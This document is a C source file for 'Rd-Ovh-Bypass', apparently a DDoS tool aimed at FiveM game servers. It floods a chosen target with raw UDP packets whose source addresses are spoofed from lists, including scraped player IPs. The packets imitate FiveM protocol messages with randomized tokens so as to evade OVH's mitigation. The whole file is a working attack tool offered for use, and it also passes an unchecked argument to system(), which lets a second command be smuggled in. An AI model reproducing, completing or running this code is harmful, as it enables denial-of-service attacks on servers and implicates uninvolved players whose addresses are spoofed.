#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;

int iptoget[800000]= {};
int iptoint = 0;


void init_rand(unsigned long int x)
{
        int i;
        Q[0] = x;
        Q[1] = x + PHI;
        Q[2] = x + PHI + PHI;
        for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
        unsigned long long int t, a = 18782LL;
        static unsigned long int i = 4095;
        unsigned long int x, r = 0xfffffffe;
        i = (i + 1) & 4095;
        t = a * Q[i] + c;
        c = (t >> 32);
        x = t + c;
        if (x < c) {
        x++;
        c++;
        }
        return (Q[i] = r - x);
}
int randnum(int min_num, int max_num)
{
    int result = 0, low_num = 0, hi_num = 0;

    if (min_num < max_num)
    {
        low_num = min_num;
        hi_num = max_num + 1; // include max_num in output
    } else {
        low_num = max_num + 1; // include max_num in output
        hi_num = min_num;
    }

//    srand(time(NULL)); we already have it initialized in init_rand, also OVH is a bitch and they recognize random numbers generated by time
    result = (rand_cmwc() % (hi_num - low_num)) + low_num;
    return result;
}
unsigned short csum (unsigned short *buf, int count)
{
        register unsigned long sum = 0;
        while( count > 1 ) { sum += *buf++; count -= 2; }
        if(count > 0) { sum += *(unsigned char *)buf; }
        while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
        return (unsigned short)(~sum);
}
unsigned short udpcsum(struct iphdr *iph, struct udphdr *udph, int pipisize) {
        struct udp_pseudo
        {
        unsigned long src_addr;
        unsigned long dst_addr;
        unsigned char zero;
        unsigned char proto;
        unsigned short length;
        } pseudohead;
        unsigned short total_len = iph->tot_len;
        pseudohead.src_addr=iph->saddr;
        pseudohead.dst_addr=iph->daddr;
        pseudohead.zero=0;
        pseudohead.proto=IPPROTO_UDP;
        pseudohead.length=htons(sizeof(struct udphdr) + pipisize);
        int totaludp_len = sizeof(struct udp_pseudo) + sizeof(struct udphdr) + pipisize;
        unsigned short *udp = malloc(totaludp_len);
        memcpy((unsigned char *)udp,&pseudohead,sizeof(struct udp_pseudo));
        memcpy((unsigned char *)udp+sizeof(struct udp_pseudo),(unsigned char *)udph,sizeof(struct udphdr) + pipisize);
        unsigned short output = csum(udp,totaludp_len);
        free(udp);
        return output;
}
void setup_ip_header(struct iphdr *iph)
{
        iph->ihl = 5;
        iph->version = 4;
        iph->tos = 0;
        iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 6;
        iph->id = htonl(54321);
        iph->frag_off = 0;
        iph->ttl = MAXTTL;
        iph->protocol = IPPROTO_UDP;
        iph->check = 0;
        iph->saddr = inet_addr("192.168.3.100");
}
void setup_udp_header(struct udphdr *udph)
{
        udph->dest = htons(floodport);
        udph->source = htons(5678);
        udph->check = 0;
        memcpy((void *)udph + sizeof(struct udphdr), "\x0f\x02\x11\x23\x9f\xdd\x10\x09\x33\xfe\x1f\x8f\xba\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xee\x31\x41\x00\x00\x41\x0f\x02\x11\x23\x9f\xdd\x10\x09\x33\xfe\x1f\x8f\xba\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xee\x31\x41\x00\x00\x41\x0f\x02\x11\x23\x9f\xdd\x10\x09\x33\xfe\x1f\x8f\xba\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xee\x31\x41\x00\x00\x41\x00\x00\x00\x00", 100);
        udph->len=htons(sizeof(struct udphdr) + 100);
}
void *flood(void *par1)
{
        char *td = (char *)par1;
        char datagram[MAX_PACKET_SIZE];
        struct iphdr *iph = (struct iphdr *)datagram;
        struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
        struct sockaddr_in sin;
        sin.sin_family = AF_INET;
        sin.sin_port = htons(randnum(0, 65535));
        sin.sin_addr.s_addr = inet_addr(td);
        int s = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
        if(s < 0){
        fprintf(stderr, "Could not open raw socket.\n");
        exit(-1);
        }
        memset(datagram, 0, MAX_PACKET_SIZE);
        setup_ip_header(iph);
        setup_udp_header(udph);
        udph->dest = htons(randnum(0, 65535));
        iph->daddr = sin.sin_addr.s_addr;
        iph->check = csum ((unsigned short *) datagram, iph->tot_len);
        char fiveminfo[15] = "\xff\xff\xff\xff\x67\x65\x74\x69\x6e\x66\x6f\x20\x78\x79\x7a";//getinfo
        char fivesec[52] = "\x8f\xff\x90\x3c\x82\xff\x00\x01\x00\x00\xff\xff\x00\x00\x05\x14\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x88\x00\x00\x00\x02\x00\x00\x00\x02\x90\x3c\x5c\x16\x00\x00\x00\x00";
        char fivetoken[88] = "\x80\x00\x29\x5a\x01\xff\x00\x01\x00\x01\x83\xd6\x86\x00\x00\x01\x00\x46\x01\x00\x00\x00\x74\x6f\x6b\x65\x6e\x3d\x62\x31\x35\x33\x31\x36\x64\x63\x2d\x36\x63\x65\x39\x2d\x34\x62\x34\x32\x2d\x39\x31\x62\x35\x2d\x32\x36\x62\x65\x34\x37\x32\x32\x35\x63\x39\x38\x26\x67\x75\x69\x64\x3d\x31\x34\x38\x36\x31\x38\x37\x39\x32\x34\x35\x34\x33\x32\x30\x31\x31\x38";
        char fivem24var1[24] = "\x14\xf4\xd4\x8d\x73\x43\x90\x9c\xec\x33\xad\xd0\x48\x90\xbb\xb1\xa2\x2f\x7e\xda\xc4\xa5\x14\xb6";
        char fivem24var2[24] = "\x86\xb6\x06\x12\xf7\xf3\x17\xb4\xa5\x2a\x8d\xfb\x5e\xce\x92\x6d\xca\x1a\x34\x2a\xd1\xb8\xaf\xf7";
        int tmp = 1;
        const int *val = &tmp;
        if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
        fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
        exit(-1);
        }
        init_rand(time(NULL));
        register unsigned int i;
        register unsigned int ipkeep = 0;
        register unsigned int varientchoose;
        register unsigned int ipid;
        int okgotcha = 0;
        register unsigned int udpsource;
        
        i = 0;
        while(1){
        if(ipkeep == 0){
            varientchoose = randnum(1,2);
            iph->saddr = htonl(iptoget[rand_cmwc()%iptoint]);
            iph->ttl = randnum(120, 130);
            ipid = randnum(0, 65535);
            udpsource = randnum(0, 65535);
            iph->id = htons(ipid);
            udph->source = udpsource;
            ipkeep++;
        }
        if(ipkeep == 1){
            iph->id = htons(ipid += 1);
            okgotcha = sizeof(fiveminfo);
            memcpy((void *)udph + sizeof(struct udphdr), fiveminfo, okgotcha);
            iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + okgotcha;
            udph->len=htons(sizeof(struct udphdr) + okgotcha);
            
            iph->check = 0;
            iph->check = csum ((unsigned short *) datagram, iph->tot_len);
            udph->check = 0;
            udph->source = rand_cmwc() & 0xFFFF;
            udph->source = udpsource;
            udph->check = udpcsum(iph, udph, okgotcha);
            sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
            ipkeep++;
            ipkeep++;
        }
        if(ipkeep == 3){
            iph->id = htons(ipid += 1);
            okgotcha = sizeof(fivesec);
            fivesec[2] = randnum(0,127);
            fivesec[3] = randnum(0,127);
            fivesec[44] = randnum(0,127);
            fivesec[45] = randnum(0,127);
            fivesec[46] = randnum(0,127);
            fivesec[47] = randnum(0,127);
            memcpy((void *)udph + sizeof(struct udphdr), fivesec, okgotcha);
            iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + okgotcha;
            udph->len=htons(sizeof(struct udphdr) + okgotcha);
            
            iph->check = 0;
            iph->check = csum ((unsigned short *) datagram, iph->tot_len);
            udph->check = 0;
            udph->source = rand_cmwc() & 0xFFFF;
            udph->source = udpsource;
            udph->check = udpcsum(iph, udph, okgotcha);
            sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
            ipkeep++;
        }
        if(ipkeep == 4){
            iph->id = htons(ipid += 1);
            okgotcha = sizeof(fivetoken);
            fivetoken[28] = randnum(97, 122);
            for(int i = 29; i <= 33; i++){
                fivetoken[i] = randnum(48, 57);
            }
            fivetoken[34] = randnum(97, 122);
            fivetoken[35] = randnum(97, 122);
            fivetoken[37] = randnum(48, 57);
            fivetoken[38] = randnum(97, 122);
            fivetoken[39] = randnum(97, 122);
            fivetoken[40] = randnum(48, 57);
            fivetoken[42] = randnum(48, 57);
            fivetoken[43] = randnum(97, 122);
            fivetoken[44] = randnum(48, 57);
            fivetoken[45] = randnum(48, 57);
            fivetoken[47] = randnum(48, 57);
            fivetoken[48] = randnum(48, 57);
            fivetoken[49] = randnum(97, 122);
            fivetoken[50] = randnum(48, 57);
            fivetoken[52] = randnum(48, 57);
            fivetoken[53] = randnum(48, 57);
            fivetoken[54] = randnum(97, 122);
            fivetoken[55] = randnum(97, 122);
            for(int i = 56; i <= 60; i++){
                fivetoken[i] = randnum(48, 57);
            }
            fivetoken[61] = randnum(97, 122);
            fivetoken[62] = randnum(48, 57);
            fivetoken[63] = randnum(48, 57);
            for(int i = 70; i <= 87; i++){
                fivetoken[i] = randnum(48, 57);
            }//generating new token
            memcpy((void *)udph + sizeof(struct udphdr), fivetoken, okgotcha);
            iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + okgotcha;
            udph->len=htons(sizeof(struct udphdr) + okgotcha);
            
            iph->check = 0;
            iph->check = csum ((unsigned short *) datagram, iph->tot_len);
            udph->check = 0;
            udph->source = rand_cmwc() & 0xFFFF;
            udph->source = udpsource;
            udph->check = udpcsum(iph, udph, okgotcha);
            sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
            ipkeep++;
        }
        if(ipkeep == 5){
            if(varientchoose == 1){
            iph->id = htons(ipid += 1);
            okgotcha = sizeof(fivem24var1);
            memcpy((void *)udph + sizeof(struct udphdr), fivem24var1, okgotcha);
            iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + okgotcha;
            udph->len=htons(sizeof(struct udphdr) + okgotcha);
            
            iph->check = 0;
            iph->check = csum ((unsigned short *) datagram, iph->tot_len);
            udph->check = 0;
            udph->source = rand_cmwc() & 0xFFFF;
            udph->source = udpsource;
            udph->check = udpcsum(iph, udph, okgotcha);
            sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
            ipkeep = 0;   
            }
            if(varientchoose == 2){
            iph->id = htons(ipid += 1);
            okgotcha = sizeof(fivem24var2);
            memcpy((void *)udph + sizeof(struct udphdr), fivem24var2, okgotcha);
            iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + okgotcha;
            udph->len=htons(sizeof(struct udphdr) + okgotcha);
            
            iph->check = 0;
            iph->check = csum ((unsigned short *) datagram, iph->tot_len);
            udph->check = 0;
            udph->source = rand_cmwc() & 0xFFFF;
            udph->source = udpsource;
            udph->check = udpcsum(iph, udph, okgotcha);
            sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
            ipkeep = 0;   
            }
        }
        pps++;
        if(i >= limiter)
        {
        i = 0;
        usleep(1);
        }
        i++;
        }
}

int main(int argc, char *argv[ ])
{
        fprintf(stderr, "\nRd-Ovh-Bypass : Welcome. Thanks for using.\n");
        fprintf(stderr, "Rd-Ovh-Bypass : Create by Redouu.\n");

        if(argc < 6){
            fprintf(stderr, "\nRd-Ovh-Bypass : Welcome. Thanks for using.\n");
            fprintf(stderr, "\nRd-Ovh-Bypass : Create by Redouu.\n");
            fprintf(stdout, "\nUsage: %s <target ip> <port> <threads> <pps, -1 for no limit> <time>\n\n", argv[0]);
            exit(-1);
        }
        if(argv[6]) {
            printf("Rd-Ovh-Bypass : Getting IP of players in Server. (cfx.re/join/%s).\n", argv[6]);
            char commands[256];
            strcpy(commands, "node index.js ");
            strcat(commands, argv[6]);
            strcat(commands, " > /dev/null");
            system(commands);

            FILE *fp = fopen("ip-get.txt", "r");
            size_t len = 255;
            char *line = malloc(sizeof(char) * len);
            if (fp == NULL) {
                printf("can open file !");
                exit(1);
            }
            while(fgets(line, len, fp) != NULL) {
                int value = atoi(line);
                iptoget[iptoint] = value;
                iptoint = (iptoint + 1);
            }
            free(line);
            printf("Rd-Ovh-Bypass : Loaded %d Players IP Address.\n", iptoint);
        }

        FILE *fp2 = fopen("base-ip.txt", "r");
        size_t len2 = 255;
        char *line2 = malloc(sizeof(char) * len2);
        if (fp2 == NULL) {
            printf("can open file !");
            exit(1);
        }
        while(fgets(line2, len2, fp2) != NULL) {
            unsigned long valuef = htonl(inet_addr(line2));
            int value2 = valuef;
            iptoget[iptoint] = value2;
            iptoint = (iptoint + 1);
        }
        free(line2);

        printf("Rd-Ovh-Bypass : Loaded %d Base IP Address.\n\n", iptoint);
        fprintf(stdout, "Rd-Ovh-Bypass : Setting up socket's ...\n");
        int num_threads = atoi(argv[3]);
        floodport = atoi(argv[2]);
        int maxpps = atoi(argv[4]);
        limiter = 0;
        pps = 0;
        pthread_t thread[num_threads];
        int multiplier = 20;
        int i;
        for(i = 0;i<num_threads;i++){
        pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
        }
        fprintf(stdout, "Rd-Ovh-Bypass : Sending packet's ...\n");
        for(i = 0;i<(atoi(argv[5])*multiplier);i++)
        {
        usleep((1000/multiplier)*1000);
        if((pps*multiplier) > maxpps)
        {
        if(1 > limiter)
        {
        sleeptime+=100;
        } else {
        limiter--;
        }
        } else {
        limiter++;
        if(sleeptime > 25)
        {
        sleeptime-=25;
        } else {
        sleeptime = 0;
        }
        }
        pps = 0;
        }
        return 0;
}
